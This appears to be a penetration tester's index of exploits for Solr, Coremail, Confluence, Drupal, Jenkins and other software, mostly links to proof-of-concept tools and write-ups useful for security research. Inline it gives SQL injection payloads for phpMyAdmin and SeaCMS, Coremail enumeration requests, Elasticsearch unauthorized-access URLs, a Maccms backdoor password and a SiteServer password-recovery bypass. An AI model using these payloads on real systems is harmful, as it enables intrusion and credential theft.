[Microsoft Apache Solr RCE Velocity Template | Bug Bounty POC](https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/)

[Apache Solr Velocity RCE: did it really get a shell?](https://www.hayasec.me/2019/11/06/apache-solr-velocity-rce-getshell/)

[Graphical one-click detection tool for the Solr template injection vulnerability](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool)

[CVE-2020-13957: reproducing the Apache Solr unauthorized upload vulnerability](https://mp.weixin.qq.com/s/EbNK_PQZwgR6K31HwjAVRQ)

[CVE-2020-13957 Apache Solr unauthorized upload vulnerability](https://mp.weixin.qq.com/s/5iwk08z3oP9Tim5ETBIBBg)

[CVE-2020-13957: reproducing the Apache Solr unauthorized upload vulnerability](https://mp.weixin.qq.com/s/1I-EwYWMnlsLsVf67F3G1w)

[Setting up an environment for and reproducing the Solr arbitrary file read vulnerability](https://mp.weixin.qq.com/s/1AYen3qZMhiiym_wJh5lzw)

[Apache Solr <= 8.8.2 (latest) arbitrary file deletion](https://mp.weixin.qq.com/s/dECH74n5qjrWT9lok8IkPQ)

[Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF)

## Apache SuperSet

[Basic PoC for CVE-2023-27524: insecure default configuration in Apache Superset](https://github.com/horizon3ai/CVE-2023-27524)

## Big-IP

[BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388](https://github.com/TomArni680/CVE-2022-1388-POC)

## Coremail

Version information

```
/coremail/s/json?func=verify
```

Username brute-forcing

```
/coremail/s?func=user:getLocaleUserName
{
"email":"zhangsan",
"defaultURL":"1"
}
```

[Export the Coremail address book](https://github.com/newcodor/coremail_address_list_export)

[Coremail vulnerabilities](https://github.com/HackJava/HackCoremail)

[One-click export of the Coremail mail system organization address book](https://github.com/dpu/coremail-address-book)

[Reproducing the Coremail n-day arbitrary password change](https://mp.weixin.qq.com/s/YZwMvWiqVNh5Locf-eBCVw)

[yuxiaoyou123/coremail-exp](https://github.com/yuxiaoyou123/coremail-exp)

[My take on Coremail vulnerabilities (ramblings)](https://mp.weixin.qq.com/s/q6VUmRxBPLKT35qPHr4gSw)

[jimoyong/CoreMailUploadRce](https://github.com/jimoyong/CoreMailUploadRce)

## Confluence

[Exploitation tool for the Confluence unauthenticated administrator creation vulnerability (CVE-2023-22515)](https://github.com/ad-calcium/CVE-2023-22515)

[CVE-2022-26134 proof of concept](https://github.com/jbaines-r7/through_the_wire)

[CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL)

[Analysis of the Confluence file read vulnerability (CVE-2019-3394)](https://paper.seebug.org/1025/)

[Analysis of the Confluence unauthenticated RCE vulnerability (CVE-2019-3396)](https://paper.seebug.org/884/)

[Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP)

[CVE-2021-26084 Confluence command execution: memory shell injection for all versions](https://mp.weixin.qq.com/s/wbIvFQmkdJH6g6ZKBFXyYQ)

[alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC)

## DedeCMS

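[Vulnerability scanner for all DedeCMS versions](https://github.com/lengjibo/dedecmscan)

[Solving a long-standing DedeCMS problem: finding the admin directory](https://xz.aliyun.com/t/2064)

[Collecting and reproducing vulnerabilities in the latest DedeCMS, for study](https://blog.szfszf.top/article/25/)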

[Chasing a Dream :: Pre-authenticated Remote Code Execution in Dedecms](https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html)

[DedeCMS unauthenticated RCE vulnerability: root cause and impact analysis](https://mp.weixin.qq.com/s/KZ7O0JRLvk4_O1GvL5lMVw)

[Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability](https://srcincite.io/pocs/src-2021-0029.py.txt)

## Django

[Reproducing the CVE-2020-7471 Django StringAgg SQL Injection vulnerability](https://mp.weixin.qq.com/s/j4OL927w3JtL1k2hFvmffw)

## Discuz

[Discuz vulnerability roundup (PDF)](https://github.com/Awrrays/Pentest-Tips/blob/main/Discuz%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86.pdf)

[In-depth analysis of the Discuz!X front-end arbitrary file deletion vulnerability](https://xz.aliyun.com/t/34)

[Discuz! RCE caused by unauthorized Memcached access](https://xz.aliyun.com/t/2018)

[Discuz!X personal account deletion vulnerability](https://xz.aliyun.com/t/2297)

[Analysis of the Discuz! X3.4 backend arbitrary file deletion vulnerability](https://xz.aliyun.com/t/4725)

[Analysis of the DiscuzX v3.4 ranking page stored XSS vulnerability](https://xz.aliyun.com/t/2899)

[WooYun-2015-137991: front-end getshell in Discuz using UC_KEY (2)](https://php.mengsec.com/bugs/wooyun-2015-0137991.html)

[Analysis of the Discuz! 1.5-2.5 command execution vulnerability (CVE-2018-14729)](https://paper.seebug.org/763/)

[FoolMitAh/CVE-2018-14729](https://github.com/FoolMitAh/CVE-2018-14729)

[A case analysis of the DiscuzX 3.4 SSRF vulnerability](https://mp.weixin.qq.com/s/TRCdXZU8v1NsbFhZKLa1Qw)

[Discuz x3.4 front-end SSRF](https://www.codercto.com/a/43029.html)

[theLSA/discuz-ml-rce](https://github.com/theLSA/discuz-ml-rce)

[Discuz! ML remote code execution (CVE-2019-13956)](https://www.cnblogs.com/yuzly/p/11386755.html)

[Discuz!ML V3.X code injection analysis](https://xz.aliyun.com/t/5638)

## Drupal

[CVE-2017-6920: Drupal remote code execution vulnerability analysis and PoC construction](https://paper.seebug.org/334/)

[Drupal Core 8 PECL YAML deserialization arbitrary code execution vulnerability (CVE-2017-6920)](https://vulhub.org/#/environments/drupal/CVE-2017-6920/)

https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md

[pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600)

[dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2)

[Drupal remote code execution vulnerability (CVE-2018-7602)](https://vulhub.org/#/environments/drupal/CVE-2018-7602/)

[CVE-2018-7600/drupa7-CVE-2018-7602.py](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py)

[Analysis of Drupal 1-click to RCE](https://paper.seebug.org/897/)

https://vulhub.org/#/environments/drupal/CVE-2019-6339/

[Analysis of Drupal (CVE-2020-28948/CVE-2020-28949)](https://mp.weixin.qq.com/s/-5z2gCrstyCLOOzgf1tZTg)

## ECshop

[ECShop 2.x/3.x SQL injection / arbitrary code execution vulnerability](https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md)

[ecshop 2.x code execution](https://paper.seebug.org/691/)

[ecshop backend getshell](http://www.zstreamer.cn/2020/09/09/ecshop2.7_3.6后台getshell/)

## ElasticSearch

- `http://[ip]:9200`
- `http://[ip]:9200/_plugin/head/` web management interface
- `http://[ip]:9200/hello/_search?pretty&size=50&from=50`
- `http://[ip]:9200/_cat/indices`
- `http://[ip]:9200/_river/_search` view sensitive database information
- `http://[ip]:9200/_nodes` view node data
- `http://[ip]:9200/_cat/indices?v` list all indices on the current node
- `http://[ip]:9200/_search?pretty=true` query all indices and types
- [Elasticvue](https://chrome.google.com/webstore/detail/elasticvue/hkedbapjpblbodpgbajblpnlpenaebaa?hl=en-US) - a browser extension used for exploiting unauthorized access

[ElasticSearch command execution vulnerability (CVE-2014-3120) test environment](https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/)

[Remote Code Execution in Elasticsearch - CVE-2015-1427](https://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/)

[ElasticSearch Groovy sandbox bypass && code execution vulnerability (CVE-2015-1427) test environment](https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/)

https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/

[Elasticsearch directory traversal vulnerability (CVE-2015-5531): reproduction and analysis (with PoC)](https://www.freebuf.com/vuls/99942.html)

https://blog.csdn.net/u013613428/article/details/121884479

## Exchange

[Exchange mail server account brute-forcing](https://github.com/grayddq/EBurst)

[Reading Exchange mail using an NTLM hash](https://github.com/Ridter/GetMail)

[Exchange penetration testing summary](https://www.anquanke.com/post/id/184342)

## ewebeditor

[ewebeditor editor vulnerability summary](https://www.0dayhack.com/post-426.html)

## Fastadmin

[Front-end getshell vulnerability in the latest fastadmin](https://mp.weixin.qq.com/s/XR6p6sf3__QtpMjJuJEjfA)

[fastadmin file management plugin](https://github.com/WenchaoLin/Filex)

## FastJson

[fastjson RCE response echo based on dbcp](https://github.com/depycode/fastjson-local-echo)

[Fastjson-Gadgets automatic scanner](https://github.com/H3rmesk1t/Fastjson-Gadgets-Automatic-Scanner)

[Collection of Fastjson techniques and tricks](https://github.com/safe6Sec/Fastjson)

[fastjson bypass autotype 1.2.68 with Throwable and AutoCloseable.](https://github.com/Y4er/fastjson-bypass-autotype-1.2.68)

## Fckeditor

[Universal file upload script for fck 2.4.3](https://github.com/chaosec2021/FCKeditor-2.4.3--exp)

[Summary of getting a shell via Fckeditor upload vulnerabilities](https://www.0dayhack.com/post-413.html)

## Flask

[Flask memory shell](https://github.com/iceyhexman/flask_memory_shell)

## GeoServer

[CVE-2023-25157 - GeoServer SQL injection - PoC](https://github.com/win3zz/CVE-2023-25157/)

## Gitlab

[gitlab-version-nse](https://github.com/righel/gitlab-version-nse)

[Arbitrary file read via the bulk imports UploadsPipeline](https://gitlab.com/gitlab-org/gitlab/-/issues/349524)

[CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205)

[CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205)

[Reproducing the GitLab arbitrary file read vulnerability](https://mp.weixin.qq.com/s/HKZHUs_bTN-00_8HsU6grA)

[Arbitrary file read via the UploadsRewriter when moving and issue](https://hackerone.com/reports/827052)

[CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992)

## Gitea

[Gitea repository migration remote command execution vulnerability.](https://github.com/wuhan005/CVE-2022-30781)

[Go code audit: the Gitea remote command execution vulnerability chain](https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html)

https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce

## Harbor

https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg

https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/

https://www.youtube.com/watch?v=v8Isqy4yR3Q

## Hikvision

[Hikvision streaming media management server sensitive information disclosure](https://github.com/Henry4E36/HikvisionInformation)

[Hikvision CVE-2021-36260 RCE vulnerability](https://github.com/Cuerz/CVE-2021-36260)

[Post-exploitation tool for the Hikvision integrated security platform](https://github.com/wafinfo/Hikvision)

[HIKVISION iVMS-8700 integrated security management platform upload.action arbitrary file upload](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20iVMS-8700%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20upload.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html)

[HIKVISION integrated security management platform applyCT Fastjson remote command execution vulnerability](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)

[HiKVISION integrated security management platform files arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20files%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[HiKVISION integrated security management platform report arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20report%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[HiKVISION integrated security management platform env information disclosure vulnerability](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html)

[Integrated security management platform _svm_api_v1_productFile remote command execution](https://mp.weixin.qq.com/s?__biz=MzIyMjkzMzY4Ng==&mid=2247505219&idx=1&sn=f48d189da00e2f7040a3b62de580d8c1)

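## Hikvision IP Network Intercom and Broadcast System

[Vulnerability reproduction: command injection vulnerability in the Hikvision IP network intercom and broadcast system](https://mp.weixin.qq.com/s?__biz=MzU5MTc1NTE0Ng==&mid=2247485360&idx=1&sn=aea143927b6bd96689f5d435bfb8df6c)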

## IIS

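[Multithreaded batch detection of the IIS short file name vulnerability + exploitation](https://github.com/VMsec/iisScaner)

[CVE-2017-7269 IIS 6.0 remote code execution vulnerability analysis and exploit](https://paper.seebug.org/259/)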

[lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC)

[edwardz246003/IIS_exploit](https://github.com/edwardz246003/IIS_exploit)

## I Doc View Online Document Preview System

[Vulnerability reproduction: remote code execution vulnerability in the I Doc View online document preview system](https://mp.weixin.qq.com/s?__biz=MzkxNTU5NjM5MQ==&mid=2247484409&idx=1&sn=ec6b363cbab59af3e323b3c18425b017&chksm=c15df6f1f62a7fe7ef6538e339eb29b59aa313a9e4c85f06482104f535ccc22fdcf83bbd2ef5&scene=126&sessionid=1701682077&key=1afad7311c1000c6326803e9993c3c3655685ec951d2506e5c3879b5677aaf2e6458039c2819a39d8ae10924fb7bc3801ac1eef39a661e9fa79211b8ba2fdfa2c640b23a6b917d9e431bc0f625f47fe16e7dcaa1d68152df42bed5848fd2efb0eda64c3b2a6765a3feb931a321c5edb2911a15b1e201ed23c21536122e4cb91f&ascene=15&uin=MzgxODQ4MjMz&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_c63b035bdde2&countrycode=GY&exportkey=n_ChQIAhIQ7Q315IOTslTK%2FxQwXGrc8RLmAQIE97dBBAEAAAAAAGIzN77M9Z8AAAAOpnltbLcz9gKNyK89dVj0u9EpNejbnNVOqEwJ4P6GYsvS0ML6oYIp1QqiHaFhhv%2FiWbMiN5JeGmU4kXOZzLVgs5F5lGq6Ld7BddxZK1XubANs13KMx3EV6BxC9PkDAobbJnFHhnB08kTxP%2F6r1jkRhFNUiEgGZoc%2BZWIVIyNXOX2NlJKwXjUMkuMi8PiN%2BPqU3zpfOqydlt%2F1IQlxoESqgm72uT8gP05hHQHf0UQmGlmiJcvcu7HumCvC0MA%2FpSugSDM7ch1bWlFQNDC1cwee&acctmode=0&pass_ticket=A4qxtGK0O4LeaDLKYYXNijQqeFho03G%2B90v3l9RyysEVcEcvjTMQ8cVu%2FWiZLpAuvaj7W%2BgV1ofOSy%2FnY1C2Gg%3D%3D&wx_header=0&fontgear=2)

## IP-Guard

[Vulnerability reproduction: IP-guard WebServer remote command execution vulnerability](https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247486971&idx=1&sn=11a6cbd4db9a45976beb39fe613a3010)

## Jboss

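[Verification and exploitation tool for JBoss and other Java deserialization vulnerabilities](https://github.com/joaomatosf/jexboss)

[Reproducing common JBoss vulnerabilities](https://www.xpshuai.cn/posts/60637/)

[JBoss vulnerability summary](http://www.zstreamer.cn/2020/07/09/Jboss漏洞总结/)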

[Red Hat JBoss EAP - Deserialization of Untrusted Data](https://www.exploit-db.com/exploits/40842)

[JBoss 4.x JBossMQ JMS deserialization vulnerability (CVE-2017-7504)](https://github.com/vulhub/vulhub/blob/master/jboss/CVE-2017-7504/README.md)

[yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149)

[jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149)

https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

[JBoss JMXInvokerServlet deserialization vulnerability](https://github.com/vulhub/vulhub/blob/master/jboss/JMXInvokerServlet-deserialization/README.md)

## JeecgBoot

[jmreport/qurestSql unauthenticated SQL injection batch-scanning PoC](https://github.com/MzzdToT/CVE-2023-1454)

## Jetty

https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28169/README.zh-cn.md

https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28164/README.zh-cn.md

## Jenkins

[awesome-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019)

[Hacking Jenkins Part 1 - Play with Dynamic Routing](https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/)

[Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/)

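[Jenkins RCE vulnerability analysis roundup](http://www.lmxspace.com/2019/09/15/Jenkins-RCE漏洞分析汇总/)

[Security research | Jenkins vulnerability analysis](https://www.freebuf.com/news/242764.html)

[Jenkins vulnerability detection, user enumeration and brute forcing](https://github.com/blackye/Jenkins)

[Jenkins arbitrary file read vulnerability (CVE-2018-1999002) reproduction notes](https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w)

[Jenkins unauthorized access RCE vulnerability reproduction notes | angelwhu_blog](https://www.angelwhu.com/blog/?p=539)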

[jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392)

## Joomla

[CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0](https://github.com/stefanlucas/Exploit-Joomla)

[Joomla! 3.7 Core SQL injection (CVE-2017-8917) vulnerability analysis](https://paper.seebug.org/305/)

[HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132)

## JumpServer

[JumpServer remote execution vulnerability reproduction](https://www.o2oxy.cn/2921.html)

[JumpServer remote command execution: points you may not know (with exploitation tool)](https://mp.weixin.qq.com/s/lbcYzNsiOYZRwQzAIYxg3g)

[Skactor/jumpserver_rce](https://github.com/Skactor/jumpserver_rce)

[Veraxy00/Jumpserver-EXP](https://github.com/Veraxy00/Jumpserver-EXP)

[A look at JumpServer security: in-depth analysis of the Sep series of vulnerabilities](https://mp.weixin.qq.com/s/3iAn_aUNg8k5qW34Yb21Bw)

[JumpServer password reset vulnerability](https://github.com/C1ph3rX13/CVE-2023-42820)

[JumpServer arbitrary file write vulnerability CVE-2023-42819 + CVE-2023-42820 = GetShell](https://github.com/C1ph3rX13/CVE-2023-42819)

## Kindeditor

[kindeditor<=4.1.5 upload vulnerability reproduction](https://www.cnblogs.com/backlion/p/10421405.html)

[Vulnerability analysis of the large-scale Kindeditor file upload incidents](https://www.freebuf.com/column/202148.html)

## Laravel

[A code-executing deserialization gadget chain in Laravel 6.x/7.x](https://www.o2oxy.cn/3588.html)

[LARAVEL <= V8.4.2 DEBUG MODE: REMOTE CODE EXECUTION](https://www.ambionics.io/blog/laravel-debug-rce)

[Vulnerability analysis | Laravel debug page RCE (CVE-2021-3129) analysis and reproduction](https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g)

[Revisiting the Laravel debug mode RCE (CVE-2021-3129) vulnerability](https://www.freebuf.com/vuls/264662.html)

[ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)

[Laravel 8.x image upload bypass](https://infosecwriteups.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b)

## Log4j

[log4j solr rce](https://twitter.com/pyn3rd/status/1470359076617932800)

[Software affected by Log4j](https://github.com/NCSC-NL/log4shell/tree/main/software)

[CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)

[The Log4j vulnerability is still being exploited today](https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/)

[Log4j-Payloads](https://github.com/queencitycyber/Log4j-Payloads)

## Maccms

```
maccms10\extend\upyun\src\Upyun\Api\Format.php
maccms10\extend\Qcloud\Sms\Sms.php
password WorldFilledWithLove
```

[Maccms v10 backdoor](http://www.360doc.com/content/20/0203/14/30583588_889434397.shtml)

## Milesight

[Milesight VPN server.js arbitrary file read vulnerability](https://peiqi.wgpsec.org/wiki/iot/Milesight/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

## MinIO

[Where containers and cloud collide: a test of MinIO](https://cloud.tencent.com/developer/article/1785462)

[(CVE-2023-28432) | MinIO verify endpoint sensitive information disclosure vulnerability](https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486024&idx=1&sn=505829c79bc3bdc2b6598cdaf104666b&chksm=c1f925faf68eacec10fbc833c87f8f95578ebe0cd86b9d54690d471fd1d10eb44bf145d6be6a)

https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36

## MessageSolution

[CNVD-2021-10543: information disclosure vulnerability in the MessageSolution enterprise email archiving management system EEA](https://github.com/Henry4E36/CNVD-2021-10543)

## MetInfo

[MetInfo 5.3.19: insufficient filtering during installation leads to getshell](https://bbs.ichunqiu.com/thread-35305-1-17.html)

[MetInfo 6.0.0 vulnerability collection (1)](https://bbs.ichunqiu.com/thread-43416-1-7.html)

[MetInfo 6.1.0 vulnerabilities (2)](https://bbs.ichunqiu.com/thread-43625-1-4.html)

[Metinfo 6.1.2 SQL injection](https://bbs.ichunqiu.com/thread-46687-1-1.html)

[MetInfo latest version back-end getshell](https://bbs.ichunqiu.com/thread-29686-1-2.html)

[Some low-impact vulnerabilities in MetInfo 7](https://evi1.cn/post/metinfo7-bug/)

[Metinfo7.0 SQL Blind Injection](https://github.com/T3qui1a/metinfo_sqlinjection/issues/1)

[CVE-2018-13024 reproduction and a simple internal network penetration](https://www.freebuf.com/news/193748.html)

## Metabase

[Metabase validate remote command execution vulnerability CVE-2023-38646](https://peiqi.wgpsec.org/wiki/webapp/Metabase/Metabase%20validate%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2023-38646.html)

## MeterSphere

[Arbitrary file upload](https://github.com/metersphere/metersphere/issues/8653)

## Nacos

In most enterprise deployments the Nacos URL is /v1/auth/users rather than /nacos/v1/auth/users.

[Alibaba Nacos unauthorized access vulnerability](https://blog.csdn.net/m0_46257936/article/details/113127814)

https://raw.githubusercontent.com/dwisiswant0/nuclei-templates/add/GHSL-2020-325/cves/2021/CVE-2021-29441.yaml

[Nacos Client YAML deserialization vulnerability analysis](https://xz.aliyun.com/t/10355)

[Nacos password collision](https://www.jisuan.mobi/nX7.html)

[Nacos Hessian deserialization exploitation tool](https://github.com/c0olw/NacosRce)

## NETGEAR ProSafe SSL VPN

[NETGEAR ProSafe SSL VPN SQL injection vulnerability](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383)

## Nexus

[Nexus Repository Manager 3 remote command execution vulnerability (CVE-2019-7238)](https://vulhub.org/#/environments/nexus/CVE-2019-7238/)

[mpgn/CVE-2019-7238](https://github.com/mpgn/CVE-2019-7238)

[jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238)

[Nexus Repository Manager (CVE-2020-10199/10204) vulnerability analysis and a brief discussion of exploitation with output echo](https://www.cnblogs.com/magic-zero/p/12641068.html)

[aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199)

[CVE-2020-29436: Nexus3 XML external entity injection reproduction](https://mp.weixin.qq.com/s/u6LWHvNEieQsV-ny6xwMmQ)

## NPS

[carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass)

## Openfire

[Back-end plugin getshell](https://github.com/22CB7139/openfire_shells)

[Openfire AES and Blowfish encryption/decryption tool](https://github.com/ca3tie1/OpenFireEncryptor)

[Vulnerability reproduction: Openfire authentication bypass vulnerability leading to RCE](https://mp.weixin.qq.com/s?__biz=Mzg4NTA0MzgxNQ==&mid=2247488691&idx=1&sn=60271069ce409bb3d3198df6a265b44b)

## Oracle Access Manager

[CVE-2021-35587 Oracle Access Manager vulnerability exploitable by an unauthenticated attacker](https://github.com/antx-code/CVE-2021-35587/blob/main/CVE-2021-35587.py)

## Outlook

[A small tool for playing with Outlook](https://github.com/eksperience/KnockOutlook)

## Panalog Log Audit System

[Panalog log audit system arbitrary user creation vulnerability and back-end command execution](https://mp.weixin.qq.com/s/98kn5ry-C-IeKY2MDebjLw)

## PHPMailer

[PHPMailer arbitrary file read vulnerability](https://mp.weixin.qq.com/s/y7N3CD1683W2WX-naT5HCA)

## phpMyAdmin

[A new getshell technique for phpMyAdmin](https://zhuanlan.zhihu.com/p/25957366)

[phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution](https://www.exploit-db.com/exploits/40185)

[phpMyAdmin 4.7.x CSRF exploitation](https://blog.vulnspy.com/2018/06/10/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-exploit/)

[phpMyAdmin 4.8.1 back-end getshell](https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog)

[CVE-2018-12613 vulnerability study notes](https://mp.weixin.qq.com/s/zGJxjtDLkw9CMHGfNRu1nw)

[phpMyAdmin arbitrary file read vulnerability reproduction (CVE-2019-6799) and writing a detection PoC](https://bbs.zkaq.cn/t/4570.html)

[CVE-2019-12922 4.9.0.1 CSRF](https://www.hedysx.com/bug/2398.html)

CVE-2020-26935 phpMyAdmin back-end SQL injection

```mysql
/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
```

[phpMyAdmin 5.1.1 - XSS](https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A)

## PHPMyWind

[Notes from a penetration test](https://xz.aliyun.com/t/6018)

[PHPMyWind latest version SQL injection, plus back-end directory traversal and file read](https://blog.csdn.net/dengzhasong7076/article/details/102139691)

[PHPMyWind v5.5 audit notes](https://bbs.ichunqiu.com/thread-46703-1-1.html)

https://www.exploit-db.com/exploits/42535

## PigCMS

[PigCMS action_flashUpload arbitrary file upload vulnerability](https://peiqi.wgpsec.org/wiki/cms/PigCMS/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## Resin

[Summary of attack vectors against Resin services](https://blkstone.github.io/2017/10/30/resin-attack-vectors/)

[Resin arbitrary file read vulnerability](https://www.cnblogs.com/KevinGeorge/p/8953731.html)

[In-depth analysis of the Resin container file parsing vulnerability](https://mp.weixin.qq.com/s/eZAG3Ze0ytd5l7ci1nb-qg)

## SeaCMS

app="海洋CMS"

An attacker can exploit this vulnerability for SQL injection through the id parameter of the edit action in admin_members_group.php.

```
/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
```

## Shiro

[Small SerializationDumper-based tool for decrypting serialized data in Shiro cookies](https://github.com/r00tuser111/SerializationDumper-Shiro)

[Modified BeichenDream/InjectJDBC with added Shiro key retrieval and key modification features](https://github.com/SummerSec/AgentInjectTool)

[shiro-550-with-NoCC](https://github.com/dr0op/shiro-550-with-NoCC)

[j1anFen/shiro_attack](https://github.com/j1anFen/shiro_attack)

[ShiroExploit-Deprecated](https://github.com/feihong-cs/ShiroExploit-Deprecated)

[Echox1/ShiroExploit](https://github.com/Echox1/ShiroExploit)

[Ares-X/shiro-exploit](https://github.com/Ares-X/shiro-exploit)

[Shiro deserialization command execution detection helper tool](https://github.com/wyzxxz/shiro_rce_tool)

[Burp plugin ShiroScan, mainly for framework detection and key detection without dnslog](https://github.com/Daybr4ak/ShiroScan)

## ShopXO

[ShopXO download arbitrary file read vulnerability CNVD-2021-15822](https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog)

## ShowDoc

[ShowDoc front-end arbitrary file upload](http://47.115.146.38/2021/04/27/showdoc/)

## SiteServer

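**Password recovery**

The administrator's "password recovery question answer" is optional and is usually left blank. In that case, submitting an empty answer on the password recovery page returns the current administrator's password in plaintext (the page uses JavaScript to require that the answer length is not 0, but disabling JavaScript bypasses the check).

Visit /siteserver/forgetPassword.aspx, then disable JavaScript. Enter the username to obtain the password.

[Code audit | SiteServerCMS authentication mechanism](https://www.freebuf.com/vuls/228448.html)

[Code audit | SiteServerCMS key attack](https://www.freebuf.com/vuls/234549.html)

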